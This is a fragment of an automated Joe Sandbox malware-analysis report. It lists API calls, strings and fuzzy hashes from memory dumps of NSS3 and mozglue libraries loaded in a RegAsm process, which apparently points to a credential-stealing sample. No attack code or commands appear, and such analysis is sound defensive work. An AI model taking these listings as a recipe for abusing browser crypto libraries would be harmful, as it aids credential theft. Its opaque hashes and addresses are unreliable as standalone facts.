                                                                                • Instruction Fuzzy Hash: 3F31F5357012159FDB149F24DD58B4A7BB5AFA631CF088428E90CD7612DB34D89ACBD1
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitPIN), ref: 6C902DF6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C902E24
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C902E33
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C902E49
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C902E68
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C902E81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                • API String ID: 1003633598-1777813432
                                                                                • Opcode ID: 12589d5b7e23ecf1d4a2703d863ee997255e0d0eacdc818ed9cea9787ec36d9e
                                                                                • Instruction ID: 55133ad05c0b6bb8814876bfa23f97d390ed1bcd178afb965c2ea7323c1fdf54
                                                                                • Opcode Fuzzy Hash: 12589d5b7e23ecf1d4a2703d863ee997255e0d0eacdc818ed9cea9787ec36d9e
                                                                                • Instruction Fuzzy Hash: 6931E171701215ABCB258F54DD5CB5A7BB5AFA6318F048028E80CE7B52DB34D84ACBE2
                                                                                APIs
                                                                                  • Part of subcall function 6C7F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7C4A68), ref: 6C7F945E
                                                                                  • Part of subcall function 6C7F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7F9470
                                                                                  • Part of subcall function 6C7F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7F9482
                                                                                  • Part of subcall function 6C7F9420: __Init_thread_footer.LIBCMT ref: 6C7F949F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C7FEC84
                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7FEC8C
                                                                                  • Part of subcall function 6C7F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7F94EE
                                                                                  • Part of subcall function 6C7F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7F9508
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C7FECA1
                                                                                • AcquireSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7FECAE
                                                                                • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C7FECC5
                                                                                • ReleaseSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7FED0A
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C7FED19
                                                                                • CloseHandle.KERNEL32(?), ref: 6C7FED28
                                                                                • free.MOZGLUE(00000000), ref: 6C7FED2F
                                                                                • ReleaseSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7FED59
                                                                                Strings
                                                                                • [I %d/%d] profiler_ensure_started, xrefs: 6C7FEC94
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                • String ID: [I %d/%d] profiler_ensure_started
                                                                                • API String ID: 4057186437-125001283
                                                                                • Opcode ID: 88a5d8841be719600cd204d352944487ac633c2e654bf5560016651576c5b0fc
                                                                                • Instruction ID: 2f1a60fc1be6cb785e4dfc342577480e9ad8ca2d1ca6deafdfe702b611f00743
                                                                                • Opcode Fuzzy Hash: 88a5d8841be719600cd204d352944487ac633c2e654bf5560016651576c5b0fc
                                                                                • Instruction Fuzzy Hash: B32126B16005189BCB209FA4DA4CAAB3739EB5632DF105A70FC2C47B41DB719806CBF1
                                                                                APIs
                                                                                • sqlite3_initialize.NSS3 ref: 6C9A2D9F
                                                                                  • Part of subcall function 6C85CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8BF9C9,?,6C8BF4DA,6C8BF9C9,?,?,6C88369A), ref: 6C85CA7A
                                                                                  • Part of subcall function 6C85CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C85CB26
                                                                                • sqlite3_exec.NSS3(?,?,6C9A2F70,?,?), ref: 6C9A2DF9
                                                                                • sqlite3_free.NSS3(00000000), ref: 6C9A2E2C
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E3A
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E52
                                                                                • sqlite3_mprintf.NSS3(6CA0AAF9,?), ref: 6C9A2E62
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E70
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E89
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2EBB
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2ECB
                                                                                • sqlite3_free.NSS3(00000000), ref: 6C9A2F3E
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2F4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                • String ID:
                                                                                • API String ID: 1957633107-0
                                                                                • Opcode ID: 01d48342d71db5bfefca3f7f75ac042b835624d34fd6291ed838a496c27ea036
                                                                                • Instruction ID: 4fe27e2d1abe3307e3a882fb6758e156e2e94f47adb964a786225cf6ef7edc2b
                                                                                • Opcode Fuzzy Hash: 01d48342d71db5bfefca3f7f75ac042b835624d34fd6291ed838a496c27ea036
                                                                                • Instruction Fuzzy Hash: 2C61B4B5E016058BEB10CFAAD884BDEB7B5EF58348F244424DC09AB701E771E856CBA0
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(6C8F3F23,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C62
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C76
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C86
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C93
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2CC6
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2CDA
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23), ref: 6C8F2CEA
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?), ref: 6C8F2CF7
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?), ref: 6C8F2D4D
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8F2D61
                                                                                • PL_HashTableLookup.NSS3(?,?), ref: 6C8F2D71
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F2D7E
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                • String ID:
                                                                                • API String ID: 2446853827-0
                                                                                • Opcode ID: 33f78006e0817ff22aff7555cf48df839308f48348d03a5358c1e914309efd4a
                                                                                • Instruction ID: ea858f50d2a00f0f4d548c356f2af32d2034e65134c32f64add7da9348748ef6
                                                                                • Opcode Fuzzy Hash: 33f78006e0817ff22aff7555cf48df839308f48348d03a5358c1e914309efd4a
                                                                                • Instruction Fuzzy Hash: C0510AB5D00605ABEB205F28DD448AA7774BF1A35CB048934EC1897B11E735ED65C7E1
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854C97
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CB0
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CC9
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D11
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D2A
                                                                                • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D4A
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D57
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D97
                                                                                • PR_Lock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854DBA
                                                                                • PR_WaitCondVar.NSS3 ref: 6C854DD4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854DE6
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854DEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                • String ID:
                                                                                • API String ID: 3388019835-0
                                                                                • Opcode ID: 0d3d57fb4a12a2ad2cf846bcd5fc893c328c18be63f277fb2a6eed226673bbe2
                                                                                • Instruction ID: ff765964eed19bb5014adb12dfbd0836f45dcfa3a49e792b08b50801117cfa8f
                                                                                • Opcode Fuzzy Hash: 0d3d57fb4a12a2ad2cf846bcd5fc893c328c18be63f277fb2a6eed226673bbe2
                                                                                • Instruction Fuzzy Hash: 2C41D4B1A04715CFCB64AF78D6841A9BBF0BF86318F068A69DC48D7710E730D8A5CB81
                                                                                APIs
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C91DE64), ref: 6C91ED0C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C91ED22
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C91ED4A
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C91ED6B
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C91ED38
                                                                                  • Part of subcall function 6C854C70: TlsGetValue.KERNEL32(?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854C97
                                                                                  • Part of subcall function 6C854C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CB0
                                                                                  • Part of subcall function 6C854C70: PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CC9
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6C91ED52
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C91ED83
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C91ED95
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C91ED9D
                                                                                  • Part of subcall function 6C9364F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C93127C,00000000,00000000,00000000), ref: 6C93650E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                • String ID: security
                                                                                • API String ID: 3323615905-3315324353
                                                                                • Opcode ID: ac27d22f8bc687c379e6cc14bf2147d0c071a56f1e63d9e677d7b2d2fecb2c50
                                                                                • Instruction ID: 76c747c35ee1204c95e9dd787dbc7abefde5e9476aedb798a5fc1823dcc26377
                                                                                • Opcode Fuzzy Hash: ac27d22f8bc687c379e6cc14bf2147d0c071a56f1e63d9e677d7b2d2fecb2c50
                                                                                • Instruction Fuzzy Hash: CD116D39D0822C6BD7105625AC4DBBB72BCBFA170CF450534E859A6E41F724E51CC6E7
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitToken), ref: 6C902CEC
                                                                                • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C902D07
                                                                                  • Part of subcall function 6C9E09D0: PR_Now.NSS3 ref: 6C9E0A22
                                                                                  • Part of subcall function 6C9E09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C9E0A35
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C9E0A66
                                                                                  • Part of subcall function 6C9E09D0: PR_GetCurrentThread.NSS3 ref: 6C9E0A70
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C9E0A9D
                                                                                  • Part of subcall function 6C9E09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C9E0AC8
                                                                                  • Part of subcall function 6C9E09D0: PR_vsmprintf.NSS3(?,?), ref: 6C9E0AE8
                                                                                  • Part of subcall function 6C9E09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9E0B19
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9E0B48
                                                                                  • Part of subcall function 6C9E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9E0C76
                                                                                  • Part of subcall function 6C9E09D0: PR_LogFlush.NSS3 ref: 6C9E0C7E
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C902D22
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(?), ref: 6C9E0B88
                                                                                  • Part of subcall function 6C9E09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9E0C5D
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C9E0C8D
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0C9C
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(?), ref: 6C9E0CD1
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C9E0CEC
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0CFB
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9E0D16
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C9E0D26
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0D35
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C9E0D65
                                                                                  • Part of subcall function 6C9E09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C9E0D70
                                                                                  • Part of subcall function 6C9E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9E0D90
                                                                                  • Part of subcall function 6C9E09D0: free.MOZGLUE(00000000), ref: 6C9E0D99
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C902D3B
                                                                                  • Part of subcall function 6C9E09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C9E0BAB
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0BBA
                                                                                  • Part of subcall function 6C9E09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9E0D7E
                                                                                • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C902D54
                                                                                  • Part of subcall function 6C9E09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9E0BCB
                                                                                  • Part of subcall function 6C9E09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9E0BDE
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(?), ref: 6C9E0C16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                • API String ID: 420000887-1567254798
                                                                                • Opcode ID: 5fa62d53c714f7f3d136b83d91484df66b610623820c22e3549821c8a6d24eaf
                                                                                • Instruction ID: 701c72a616467b553621d1e58ff757d6c0ec670ad007cc7706c56e531138bb85
                                                                                • Opcode Fuzzy Hash: 5fa62d53c714f7f3d136b83d91484df66b610623820c22e3549821c8a6d24eaf
                                                                                • Instruction Fuzzy Hash: 76212175300241AFDB159F54EE9CA857BB2EBA631DF048129E508D3622CB30CC4ADBA1
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(Aborting,?,6C8C2357), ref: 6C9E0EB8
                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C8C2357), ref: 6C9E0EC0
                                                                                • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9E0EE6
                                                                                  • Part of subcall function 6C9E09D0: PR_Now.NSS3 ref: 6C9E0A22
                                                                                  • Part of subcall function 6C9E09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C9E0A35
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C9E0A66
                                                                                  • Part of subcall function 6C9E09D0: PR_GetCurrentThread.NSS3 ref: 6C9E0A70
                                                                                  • Part of subcall function 6C9E09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C9E0A9D
                                                                                  • Part of subcall function 6C9E09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C9E0AC8
                                                                                  • Part of subcall function 6C9E09D0: PR_vsmprintf.NSS3(?,?), ref: 6C9E0AE8
                                                                                  • Part of subcall function 6C9E09D0: EnterCriticalSection.KERNEL32(?), ref: 6C9E0B19
                                                                                  • Part of subcall function 6C9E09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C9E0B48
                                                                                  • Part of subcall function 6C9E09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C9E0C76
                                                                                  • Part of subcall function 6C9E09D0: PR_LogFlush.NSS3 ref: 6C9E0C7E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9E0EFA
                                                                                  • Part of subcall function 6C8CAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C8CAF0E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F16
                                                                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F1C
                                                                                • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F25
                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                • API String ID: 3905088656-1374795319
                                                                                • Opcode ID: a93ab34110c7edd726ceb067a31f26269170841cd01924e2a971f113b57b856d
                                                                                • Instruction ID: c800c68d08b0d72c92d117ec657afc4689b894f9728e907c877935e1722e5efd
                                                                                • Opcode Fuzzy Hash: a93ab34110c7edd726ceb067a31f26269170841cd01924e2a971f113b57b856d
                                                                                • Instruction Fuzzy Hash: 7FF028B59002247BEF053BA0DC49CAB3E3CDF4626CF048424FD0902602EA39E95596F3
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6C944DCB
                                                                                  • Part of subcall function 6C930FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931000
                                                                                  • Part of subcall function 6C930FF0: PR_NewLock.NSS3(?,00000800,6C8CEF74,00000000), ref: 6C931016
                                                                                  • Part of subcall function 6C930FF0: PL_InitArenaPool.NSS3(00000000,security,6C8D87ED,00000008,?,00000800,6C8CEF74,00000000), ref: 6C93102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C944DE1
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
